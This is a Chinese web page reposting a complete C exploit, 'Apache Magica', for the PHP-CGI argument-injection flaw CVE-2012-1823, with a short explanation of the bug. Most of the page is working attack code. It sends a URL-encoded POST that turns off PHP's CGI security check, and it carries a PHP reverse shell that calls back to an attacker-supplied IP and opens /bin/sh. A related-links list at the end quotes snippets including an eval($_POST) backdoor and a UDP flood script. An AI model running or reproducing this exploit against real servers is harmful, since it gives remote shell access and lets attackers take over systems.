php5系列的apache远程执行漏洞攻击脚本

php5.x系列/apache远程执行漏洞及攻击脚本以下为相关代码,请文明使用。。。

代码如下:

/* Apache Magica by Kingcope */
/* gcc apache-magika.c -o apache-magika -lssl */
/* This is a code execution bug in the combination of Apache and PHP.
On debian and Ubuntu the vulnerability is present in the default install
of the php5-cgi package. When the php5-cgi package is installed on Debian and
Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
the binary because this binary has a security check enabled when installed with
Apache http server and this security check is circumvented by the exploit.
When accessing the php-cgi binary the security check will block the request and
will not execute the binary.
In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
check is done when the php.ini configuration setting cgi.force_redirect is set
and the php.ini configuration setting cgi.redirect_status_env is set to no.
This makes it possible to execute the binary bypassing the Security check by
setting these two php.ini settings.
Prior to this code for the Security check getopt is called and it is possible
to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
-d switch. If both values are set to zero and the request is sent to the server
php-cgi gets fully executed and we can use the payload in the POST data field
to execute arbitrary php and therefore we can execute programs on the system.
apache-magika.c is an exploit that does exactly the prior described. It does
support SSL.
/* Affected and tested versions
PHP 5.3.10
PHP 5.3.8-1
PHP 5.3.6-13
PHP 5.3.3
PHP 5.2.17
PHP 5.2.11
PHP 5.2.6-3
PHP 5.2.6+lenny16 with Suhosin-Patch
Affected versions
PHP prior to 5.3.12
PHP prior to 5.4.2
Unaffected versions
PHP 4 - getopt parser unexploitable
PHP 5.3.12 and up
PHP 5.4.2 and up
Unaffected versions are patched by CVE-2012-1823.
*/
/*    .
     /'\rrq rk
 .  // \\  .
.x.//fco\\-|-
 '//cmtco\\zt
 //6meqrg.\\tq
//_________\\'
EJPGQO
apache-magica.c by Kingcope
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/types.h>
#include <stddef.h>
#include <openssl/rand.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

typedef struct {
    int sockfd;
    SSL *handle;
    SSL_CTX *ctx;
} connection;

void usage(char *argv[])
{
  printf("usage: %s <--target target> <--port port> <--protocol http|https> " \
  "<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\n",
   argv[0]);
  exit(1);
}

char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
 "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
 "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
 "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
 "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
 "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
 "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
 "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
 "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
 "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
 "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
 "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
 "Host: %s\r\n" \
 "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like mac OS X) appleWebKit/536.26" \
 "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
 "Content-Type: application/x-www-form-urlencoded\r\n" \
 "Content-Length: %d\r\n" \
 "Connection: close\r\n\r\n%s";
char phpstr[] = "<?php\n" \
"set_time_limit(0);\n" \
"$ip = '%s';\n" \
"$port = %d;\n" \
"$chunk_size = 1400;\n" \
"$write_a = null;\n" \
"$error_a = null;\n" \
"$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n" \
"$daemon = 0;\n" \
"$debug = 0;\n" \
"if (function_exists('pcntl_fork')) {\n" \
"   $pid = pcntl_fork();    \n" \
"   if ($pid == -1) {\n" \
"       printit(\"ERROR: Can't fork\");\n" \
"       exit(1);\n" \
"   }\n" \
"   if ($pid) {\n" \
"       exit(0);\n" \
"   }\n" \
"   if (posix_setsid() == -1) {\n" \
"       printit(\"Error: Can't setsid()\");\n" \
"       exit(1);\n" \
"   }\n" \
"   $daemon = 1;\n" \
"} else {\n" \
"   printit(\"WARNING: Failed to daemonise.\");\n" \
"}\n" \
"chdir(\"/\");\n" \
"umask(0);\n" \
"$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n" \
"if (!$sock) {\n" \
"   printit(\"$errstr ($errno)\");\n" \
"   exit(1);\n" \
"}\n" \
"$descriptorspec = array(\n" \
"   0 => array(\"pipe\", \"r\"),\n" \
"   1 => array(\"pipe\", \"w\"),\n" \
"   2 => array(\"pipe\", \"w\")\n" \
");\n" \
"$process = proc_open($shell, $descriptorspec, $pipes);\n" \
"if (!is_resource($process)) {\n" \
"   printit(\"ERROR: Can't spawn shell\");\n" \
"   exit(1);\n" \
"}\n" \
"stream_set_blocking($pipes[0], 0);\n" \
"stream_set_blocking($pipes[1], 0);\n" \
"stream_set_blocking($pipes[2], 0);\n" \
"stream_set_blocking($sock, 0);\n" \
"while (1) {\n" \
"   if (feof($sock)) {\n" \
"       printit(\"ERROR: Shell connection terminated\");\n" \
"       break;\n" \
"   }\n" \
"   if (feof($pipes[1])) {\n" \
"       printit(\"ERROR: Shell process terminated\");\n" \
"       break;\n" \
"   }\n" \
"   $read_a = array($sock, $pipes[1], $pipes[2]);\n" \
"   $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n" \
"   if (in_array($sock, $read_a)) {\n" \
"       if ($debug) printit(\"SOCK READ\");\n" \
"       $input = fread($sock, $chunk_size);\n" \
"       if ($debug) printit(\"SOCK: $input\");\n" \
"       fwrite($pipes[0], $input);\n" \
"   }\n" \
"   if (in_array($pipes[1], $read_a)) {\n" \
"       if ($debug) printit(\"STDOUT READ\");\n" \
"       $input = fread($pipes[1], $chunk_size);\n" \
"       if ($debug) printit(\"STDOUT: $input\");\n" \
"       fwrite($sock, $input);\n" \
"   }\n" \
"   if (in_array($pipes[2], $read_a)) {\n" \
"       if ($debug) printit(\"STDERR READ\");\n" \
"       $input = fread($pipes[2], $chunk_size);\n" \
"       if ($debug) printit(\"STDERR: $input\");\n" \
"       fwrite($sock, $input);\n" \
"   }\n" \
"}\n" \
"\n" \
"fclose($sock);\n" \
"fclose($pipes[0]);\n" \
"fclose($pipes[1]);\n" \
"fclose($pipes[2]);\n" \
"proc_close($process);\n" \
"function printit ($string) {\n" \
"   if (!$daemon) {\n" \
"       print \"$string\n\";\n" \
"   }\n" \
"}\n" \
"exit(1);\n" \
"?>";

struct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)
{
 struct hostent *he;
 struct sockaddr_in server, *servercopy;

if ((he=gethostbyname(hostname)) == NULL) {
  printf("Hostname cannot be resolved\n");
  exit(255);
 }

servercopy = malloc(sizeof(struct sockaddr_in));
 if (!servercopy) {
    printf("malloc error (1)\n");
    exit(255);
 }
 memset(&server, '\0', sizeof(struct sockaddr_in));
 memcpy(&server.sin_addr, he->h_addr_list[0],  he->h_length);
 server.sin_family = AF_INET;
 server.sin_port = htons(port);
 memcpy(servercopy, &server, sizeof(struct sockaddr_in));
 return servercopy;
}

char *sslread(connection *c)
{
  char *rc = NULL;
  int received, count = 0, count2=0;
  char ch;

for(;;)
  {
   if (!rc)
    rc = calloc(1024, sizeof (char) + 1);
   else
    if (count2 % 1024 == 0) {
     rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
    }
    received = SSL_read(c->handle, &ch, 1);
    if (received == 1) {
     rc[count++] = ch;
     count2++;
     if (count2 > 1024*5)
      break;
    }
    else
     break;
   }
  return rc;
}

char *read_(int sockfd)
{
  char *rc = NULL;
  int received, count = 0, count2=0;
  char ch;

for(;;)
  {
   if (!rc)
    rc = calloc(1024, sizeof (char) + 1);
   else
    if (count2 % 1024 == 0) {
     rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
    }
    received = read(sockfd, &ch, 1);
    if (received == 1) {
     rc[count++] = ch;
     count2++;
     if (count2 > 1024*5)
      break;
    }
    else
     break;
   }
  return rc;
}

void main(int argc, char *argv[])
{
  char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,
   *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;
  char httpsflag=0;
  unsigned short port=0, reverseport=0;
  struct sockaddr_in *server;
  int sockfd;
  unsigned int writesize, tmpsize;
  unsigned int i;
  connection *sslconnection;
  printf("-== Apache Magika by Kingcope ==-\n");
  for(;;)
  {
     int c;
     int option_index=0;
     static struct option long_options[] = {
       {"target", required_argument, 0, 0 },
       {"port", required_argument, 0, 0 },
       {"protocol", required_argument, 0, 0 },
       {"reverse-ip", required_argument, 0, 0 },
       {"reverse-port", required_argument, 0, 0 },
       {"force-interpreter", required_argument, 0, 0 },  
       {0, 0, 0, 0 }
      };

c = getopt_long(argc, argv, "", long_options, &option_index);
     if (c < 0)
        break;

switch (c) {
     case 0:
      switch (option_index) {
       case 0:
        if (optarg) {
         target = calloc(strlen(optarg)+1, sizeof(char));
         if (!target) {
          printf("calloc error (2)\n");
          exit(255);
         }
         memcpy(target, optarg, strlen(optarg)+1);
        }
        break;
       case 1:
        if(optarg)
         port = atoi(optarg);
        break;
       case 2:
        protocol = calloc(strlen(optarg)+1, sizeof(char));
        if (!protocol) {
         printf("calloc error (3)\n");
         exit(255);
        }
        memcpy(protocol, optarg, strlen(optarg)+1);
        if (!strcmp(protocol, "https"))
         httpsflag=1;
        break;
       case 3:
        reverseip = calloc(strlen(optarg)+1, sizeof(char));
        if (!reverseip) {
         printf("calloc error (4)\n");
         exit(255);
        }
        memcpy(reverseip, optarg, strlen(optarg)+1);     
        break;
       case 4:
        reverseport = atoi(optarg);     
        reverseportstr = calloc(strlen(optarg)+1, sizeof(char));
        if (!reverseportstr) {
         printf("calloc error (5)\n");
         exit(255);
        }
        memcpy(reverseportstr, optarg, strlen(optarg)+1);      
        break;
       case 5:
        forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));
        if (!forceinterpreter) {
         printf("calloc error (6)\n");
         exit(255);
        }
        memcpy(forceinterpreter, optarg, strlen(optarg)+1);     
        break;
       default:
        usage(argv);
      }
      break;

default:
      usage(argv);
     }
  }

if ((optind < argc) || !target || !protocol || !port ||
      !reverseip || !reverseport){
    usage(argv);
  }

server = gethostbyname_(target, port);
  if (!server) {
   printf("Error while resolving hostname. (7)\n");
   exit(255);
  }

char *interpreters[5];
  int ninterpreters = 5;
  interpreters[0] = strdup("/cgi-bin/php");
  interpreters[1] = strdup("/cgi-bin/php5");
  interpreters[2] = strdup("/cgi-bin/php-cgi");
  interpreters[3] = strdup("/cgi-bin/php.cgi");
  interpreters[4] = strdup("/cgi-bin/php4");

for (i=0;i<ninterpreters;i++) {
   interpreter = interpreters[i];
   if (forceinterpreter) {
     interpreter = strdup(forceinterpreter);
   }
   if (forceinterpreter && i)
    break;
   printf("%s\n", interpreter);

sockfd = socket(AF_INET, SOCK_STREAM, 0);
   if (sockfd < 1) {
     printf("socket error (8)\n");
     exit(255);
   }

if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {
    printf("connect error (9)\n");
    exit(255);  
   }
   if (httpsflag) {
    sslconnection = (connection*) malloc(sizeof(connection));
    if (!sslconnection) {
     printf("malloc error (10)\n");
     exit(255); 
    }
    sslconnection->handle = NULL;
    sslconnection->ctx = NULL;

SSL_library_init();

sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());
    if (!sslconnection->ctx) {
     printf("SSL_CTX_new error (11)\n");
     exit(255);
    }

sslconnection->handle = SSL_new(sslconnection->ctx);
    if (!sslconnection->handle) {
     printf("SSL_new error (12)\n");
     exit(255); 
    }
    if (!SSL_set_fd(sslconnection->handle, sockfd)) {
     printf("SSL_set_fd error (13)\n");
     exit(255);
    }

if (SSL_connect(sslconnection->handle) != 1) {
     printf("SSL_connect error (14)\n");
     exit(255);     
    }
   }

tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;
   tmpstr = (char*)calloc(tmpsize, sizeof(char));
   snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);

writesize = strlen(target) + strlen(interpreter) +
     strlen(poststr) + strlen(tmpstr) + 64;
   writestr = (char*)calloc(writesize, sizeof(char));
   snprintf(writestr, writesize, poststr, interpreter,
     target, strlen(tmpstr), tmpstr);

if (!httpsflag) {
     write(sockfd, writestr, strlen(writestr));
     readbuf = read_(sockfd);
   } else {
     SSL_write(sslconnection->handle, writestr, strlen(writestr));
     readbuf = sslread(sslconnection);
   }

if (readbuf) {
     printf("***SERVER RESPONSE***\n\n%s\n\n", readbuf);
   } else {
    printf("read error (15)\n");
    exit(255);  
   }
  }
  exit(1);
}

(0)

相关推荐

  • PHP代码网站如何防范SQL注入漏洞攻击建议分享

    黑客通过SQL注入攻击可以拿到网站数据库的访问权限,之后他们就可以拿到网站数据库中所有的数据,恶意的黑客可以通过SQL注入功能篡改数据库中的数据甚至会把数据库中的数据毁坏掉.做为网络开发者的你对这种黑客行为恨之入骨,当然也有必要了解一下SQL注入这种功能方式的原理并学会如何通过代码来保护自己的网站数据库.今天就通过PHP和MySQL数据库为例,分享一下我所了解的SQL注入攻击和一些简单的防范措施和一些如何避免SQL注入攻击的建议. 什么是SQL注入(SQL Injection)? 简单来说,SQ

  • php防止sql注入示例分析和几种常见攻击正则表达式

    注入漏洞代码和分析 复制代码 代码如下: <?php function customError($errno, $errstr, $errfile, $errline) {     echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";     die(); } set_error_handler("customError"

  • PHP与SQL注入攻击防范小技巧

    下面来谈谈SQL注入攻击是如何实现的,又如何防范. 看这个例子: 复制代码 代码如下: // supposed input $name = "ilia'; DELETE FROM users;"; mysql_query("SELECT * FROM users WHERE name='{$name}'"); 很明显最后数据库执行的命令是: SELECT * FROM users WHERE name=ilia; DELETE FROM users 这就给数据库带来

  • PHP中防止SQL注入攻击和XSS攻击的两个简单方法

    mysql_real_escape_string() 所以得SQL语句如果有类似这样的写法:"select * from cdr where src =".$userId; 都要改成 $userId=mysql_real_escape_string($userId) 所有有打印的语句如echo,print等 在打印前都要使用htmlentities() 进行过滤,这样可以防止Xss,注意中文要写出htmlentities($name,ENT_NOQUOTES,GB2312) .

  • php防止网站被攻击的应急代码

    前不久一个网站竟然被攻击,数据库被刷掉了,幸好客户机器上有数据库备份.遇到这么严重的问题,必须抓紧找出漏洞,防止再次被攻击.各方面检查之后发现除了服务器需要设置正确之外,其他无从下手,只好从ip地址上来解决这种攻击的问题. 如果发现某个ip访问网站太频繁了就加入到黑名单禁止访问,这不是一个很好的办法,但情急之下向不更好的解决方式,只是权宜之计,以后再进行深入的研究一下. 这个方法总结为一句话就是:通过禁止IP频繁访问防止网站被防攻击. <?php header('Content-type: te

  • php下网站防IP攻击代码,超级实用

    今天我开发了下面的代码,算是大功初成,一天拦截了15个IP,服务器负载正常. 复制代码 代码如下: <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fileht))file_put_contents($fileht,""); $filehtarr=@file($fileht); if(in_array($ip."\r\n"

  • 整理php防注入和XSS攻击通用过滤

    对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全. 那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips 1. 假定所有的用户输入数据都是"邪恶"的 2. 弱类型的脚本语言必须保证类型和期望的一致 3.

  • 浅析PHP程序防止ddos,dns,集群服务器攻击的解决办法

    废话不多说,上代码 复制代码 代码如下: <?php//查询禁止IP$ip =$_SERVER['REMOTE_ADDR'];$fileht=".htaccess2";if(!file_exists($fileht)) file_put_contents($fileht,"");$filehtarr=@file($fileht);if(in_array($ip."\r\n",$filehtarr)) die("Warning:&q

  • php实现cc攻击防御和防止快速刷新页面示例

    复制代码 代码如下: <?php//代理IP直接退出empty($_SERVER['HTTP_VIA']) or exit('Access Denied');//防止快速刷新session_start();$seconds = '3'; //时间段[秒]$refresh = '5'; //刷新次数//设置监控变量$cur_time = time();if(isset($_SESSION['last_time'])){ $_SESSION['refresh_times'] += 1;}else{ 

  • php过滤XSS攻击的函数

    下面的函数可以用来过滤用户的输入,保证输入是XSS安全的.具体如何过滤,可以参看函数内部,也有注释. 复制代码 代码如下: <?phpfunction RemoveXSS($val) {     // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed     // this prevents some character re-spacing such as <java\0script&g

  • PHP中通过语义URL防止网站被攻击的方法分享

    什么是语义URL 攻击? 好奇心是很多攻击者的主要动机,语义URL 攻击就是一个很好的例子.此类攻击主要包括对URL 进行编辑以期发现一些有趣的事情. 例如,如果用户chris 点击了你的软件中的一个链接并到达了页面http://example.org/private.php?user=chris, 很自然地他可能会试图改变user的值,看看会发生什么.例如,他可能访问http://example.org/private.php?user=rasmus 来看一下他是否能看到其他人的信息.虽然对G

  • PHP和XSS跨站攻击的防范

    其实这个话题很早就想说说了,发现国内不少PHP站点都有XSS漏洞.今天偶然看到PHP5的一个XSS漏洞,在此小结一下.顺便提醒,使用PHP5的朋友最好打下补丁,或者升级一下. 如果你不懂什么是XSS,可以看这里,或者这里(中文的也许会好懂一些). 国内不少论坛都存在跨站脚本漏洞,例如这里  有一个Google Hack+XSS的攻击例子,针对的是Discuz 4.0.0RC3.国外也很多这样的例子,甚至Google也出现过,不过在12月初时修正了.跨站攻击很容易就可以构造,而且非常隐蔽,不易被查

  • php DOS攻击实现代码(附如何防范)

    index.php 复制代码 代码如下: <?php $ip = $_SERVER['REMOTE_ADDR']; ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="content

  • php cc攻击代码与防范方法

    cc攻击代码,支持udp 复制代码 代码如下: <?php eval($_POST[Chr(90)]); set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_GET['http']; $rand = $_GET['exit']; $exec_time = $_GET['time']; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time

  • php中常见的sql攻击正则表达式汇总

    本文实例讲述了php中常见的sql攻击正则表达式.分享给大家供大家参考.具体分析如下: 我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息.故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名. 注:正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内 复制代码 代码如下: index.php?id=1 and 1=(SELECT 1 FROM inform

  • 预防PHPDDOS的发包攻击别人的方法(iis+linux)

    说下防止PHPDDOS发包的方法 复制代码 代码如下: if (eregi("ddos-udp",$read)) { fputs($verbinden,"privmsg $Channel :ddos-udp – started udp flood – $read2[4]\n\n"); $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30); if (!$fp) { $fp = fs

随机推荐